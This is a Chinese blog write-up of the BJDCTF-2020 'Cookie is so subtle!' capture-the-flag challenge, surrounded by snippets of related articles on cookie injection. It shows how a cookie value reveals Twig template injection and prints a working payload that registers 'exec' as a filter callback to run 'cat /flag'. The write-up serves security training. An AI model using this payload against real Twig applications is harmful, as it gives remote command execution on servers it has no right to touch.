BJDCTF-2020-Web-Cookie is so subtle!(ssti模板注入+cookie处注入)

最新推荐文章于 2024-07-30 17:04:58 发布
最新推荐文章于 2024-07-30 17:04:58 发布
阅读量590 收藏 3
点赞数 1
分类专栏: CTF刷题 WEB 文章标签: 安全 cookie ssti模板注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45844670/article/details/108779082
版权
本文探讨了一种常见的安全漏洞——SSTI(Server-Side Template Injection),通过博客作者的发现,详细介绍了如何在检查cookie和flag界面时察觉到注入迹象。经过测试验证了存在Twig模板注入,并提供了注入payload。同时,提到了参考链接以深入理解SSTI漏洞及其利用方法。
摘要由CSDN通过智能技术生成

既然提示了是和cookie有关系
那么先看cookie在这里插入图片描述
没什么东西
然后去flag界面查看一下

发现多了一个user参数
在这里插入图片描述
在这里插入图片描述
这里存在注入

考虑可能是SSTI注入
尝试一下

123{{9+9}}

在这里插入图片描述
确实可以
存在twig模板注入

payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

在这里插入图片描述
参考链接:https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/#2-Twig

Kal1
关注
专栏目录
cookie注入
LSYZWF的博客
05-20 1893
文章目录cooike注入cooike注入原理:cooike注入形成条件:cooike注入阶段:设置cooikeSQL-lab实战(less-21)参考文档参考文档 cooike注入 cooike注入原理: 修改cooike的值,使注入的值能够在拼接数据库查询语句从而获得信息,基本上与SQL注入中的get方式提交和post表单方式提交无区别。 cooike注入形成条件: 1、程序对get和post方式提交的数据进行了过滤,但未对cookie提交的数据库进行过滤。 2、在条件1的基础上还需要程序对提交数据获取方
subtle-开源
05-13
subtle是基于网格的手动平铺窗口管理器,非常注重简单但可自定义的外观。 与其他平铺窗口管理器相比,subtle不会以任何方式自动平铺屏幕大小。
BJDCTF-2020-Web-Cookie is so subtle!
feng的博客
11-02 740
知识点 Cookie(其实这个点可以不用管) SSTI WP 首先环境有三个页面,分别是index.php,flag.php,hint.php。hint.php的源码里有个提示: <!-- Why not take a closer look at cookies? --> 然后flag.php里是一个输入框,输入什么它就会回显什么。这时候看看cookie,发现突然多了user: 说明这个页面是根据cookie里的user来回显的。经过尝试,这里存在模板注入。 其实这题cookie没啥
BugKu:Simple_SSTI
最新发布
m0_63944205的博客
07-30 152
如图所示,我们会得到相关的提示,根据提示信息,我们利用。1.这里我们看到需要我们注入一个flag参数。3.这里我们去传入flag查看config。1.这里告诉我们需要传一个flag的参数。3.这里我们利用flask的模板注入。的模板注入,就能直接得到flag。2.我们f12查看这里提示我们。2.我们同样的去查看页面源代码。发现页面很乱,不能得到有用信息。4.我们尝试SSTI模版注入。5.我们依次读取目录看看\。我们发现了flage目录,6.我们查看flage。
[BJDCTF-2020]Web-Cookie is so subtle
Mrs_H的博客
11-12 636
[BJDCTF-2020]Web-Cookie is so subtle 一.前言 在上一篇有关thinkphp3.2版本的考古漏洞中,我曾提到要先将sql注入漏洞的学习放缓一阵,是时候转头去复习一下其他方面的漏洞了。关于SSTI的话,其实以前是有学习过的,但是大部分关于SSTI的学习都是通过一些简单基础的靶场习题进行学习的,并没有学太多原理方面的知识。从现在开始,要通过BUU的靶场对SSTI的类型习题做一下集中的复习了。 正文 作为我开始复习SSTI的第一篇习题,我并没有选择太难的题目,选择了一个较为简单
buuctf web cookie is so subtle
qq_41696858的博客
12-19 952
题目给出了hint,这题的主要利用方法在cookie里,在页面里的hint.php也让我们看看cookie 提交一个1,发现cookie里多了一个user=1 尝试user=admin,没用,直接回显。Hello,admin 考虑一下模板注入{{7*7}},回显,hello,49 到这这题就基本上结束了,查询到后端技术是PHP,查询了一下,php模板框架,常用的两种smarty或者twig 尝试{{$smarty.version}},失败,尝试twig注入的时候,发现成功回显 payload:{{_self
第 四 周 write up (BJDCTF-2020-Web-Cookie is so subtle! Bugku 蹭网先解开密码 [网鼎杯 2020 青龙组]AreUSerialz nmap)
tothemoon的博客
10-15 842
BJDCTF-2020-Web-Cookie is so subtle!(twig,ssti) 先百度 瞎测了一下,居然测出给git泄露了? 跑了下脚本,不是git泄露。 淦 重新开始 在hint下面发现了提示 在flag.php页面登陆后,抓包发现,cookie里面多了变量user。 看了大佬的提示:是模板注入,靠,这怎么想得到啊。菜鸡我是真的涨姿势了。 如果输入{{7*’7’}}如果 输出7777777 则是jinja2模板 如果是 49 则是 twig模板 这里输出了4
Cookie注入
qq_43776408的博客
06-13 376
Cookie介绍 举个很简答的例子 你每次打开网页版csdn时 都不需要输入密码和账号 这就是Cookie的功能 再比如就是你网上购物 在不同商品不同页面来回切换 不需要二次登录 这也是Cookie功能 浏览器直接F12 在弹出的界面选择Console 然后输入document.Cookie 就可以查看当前的Cookie Cookie对XSS攻击很有用 Cookie注入代码分析 接受uname的cookie值 然后直接执行SQL语句 并未进行过滤 和之前学的注入方法一样 ’ sql语句 --+ Cook
优质资料(2021-2022年收藏)史上最强葡萄酒品鉴评价术语中英双语版对照.doc
10-11
Elegant: Describes a refined and subtle wine with finesse, often having a light to mediumbody and moderate alcohol.雅致的:形容精致而微妙的葡萄酒,通常酒体轻至中等,酒精度适中。 Finish: The sensation...
Subtle for Wordpress-开源
07-16
Subtle for Wordpress是一个开源的Wordpress主题框架,旨在提供高度的可定制性和便利性。开源软件的特性意味着用户可以自由地...通过持续的社区贡献和更新,Subtle主题框架将保持与时俱进,满足不断发展的Web设计趋势。
PPT模板-58.ppt
08-23
【PPT模板设计与应用】 PPT(PowerPoint)模板是一种预先设计好的演示文稿格式,可以帮助用户快速创建专业且视觉吸引人的幻灯片。在【PPT模板-58.ppt】中,我们可以看到一系列预设的布局、颜色搭配、字体样式以及...
Tomcat-JBoss-Weblogic-Jetty的区别和介绍
09-24
Apache全球应用最广泛的http服务器,免费,出自apache基金组织 Tomcat应用也算非常广泛的web 服务器,支持部分j2ee,免费,出自 apache基金组织 JBoss开源的应用服务器,比较受人喜爱,免费(文档要收费) weblogic应该说算是业界第一的app server,全部支持j2ee1.4, 对于开发者,有免费使用一年的许可证,用起来比较舒服,出资BEA公司,呵呵,我用的就是这个,所以比较熟悉 jboss也支持j2ee JBoss和WebLogic都含有Jsp和Servlet容器,也就可以做web容器, JBoss和WebLogic也包含EJB容器,是完整的J2EE应用服务器 tomcat 只能做jsp和servlet的container
Random Subtle Patterns-crx插件
04-06
总的来说,"Random Subtle Patterns-crx插件"巧妙地结合了Subtle Patterns的设计资源与浏览器扩展技术,为用户提供了源源不断的背景图案,同时也为网页设计师提供了方便的灵感库,体现了互联网应用的实用性和创新性...
关于cookie注入
告白的博客
07-07 377
0x00 关于cookie注入介绍 cookie注入也称作加解密注入,账户信息等可能通过加密传输,可通过抓包获取cookie信息,以及对源码分析信息结果加密后传入传出数据库,通过寻找其相关的加密方式,使注入语句加密进行注入 0x01 sqil-20-21cookie示例 通过bur抓取数据包发现cookie信息,less-20使用cookie传输但未作加密,直接在数据包通过cookie位置进行注入注入方式参考前面的联合注入,即可注入成功 -admin' union select 1,(select gro
cookie注入-access
qq_45300786的博客
04-06 490
cookie注入有很多种方法,比如用“JS”,“抓包”,“F12”,这里我为了方便,就用的“F12”这种方法 在参数id后面加上“ ’ ” 测试, 发现对GET请求参数有做过滤 打开F12, 首先将参数id=171放到cookie,发现页面依然正常! 这个时候我们把cookie的值改为171 and 1=2 但是直接在F12里的话必须是url编码才行,所以我们先去转一下码》》得到就结果...
SQL注入Cookie注入(Access)
秋水的博客
09-01 866
Cookie注入简介 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。Cookie的出现是为了给用户更好的体现,从安全的角度来讲,Cookie本身就是不安全的 为什么可以Cookie利用进行注入? 在动态脚本语言中存在超全局变量可以获取多种传参方式(基本上) 很多时...
cookies注入-突破注入系统
haodawei123的博客
01-18 304
注入站点 http://www.xxxdtzx.cn/imagebig_honor.asp?id=458 方法1: order by 语句没有禁用 ,用order by 语句测试出 访问一下网页,然后在地址栏输入下面的语句测试 javascript:alert(document.cookie=“id=”+escape(“7 and 1=2 union select 1,2,3,4,5,6,7 fr...
"蓝色星空:互联网科技类工作汇报PPT模板-2018新版
The "Point Line Blue Starry Sky Internet Technology Work Report PPT Template" is a professional and modern presentation template designed for internet and technology-related work reports. The design ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值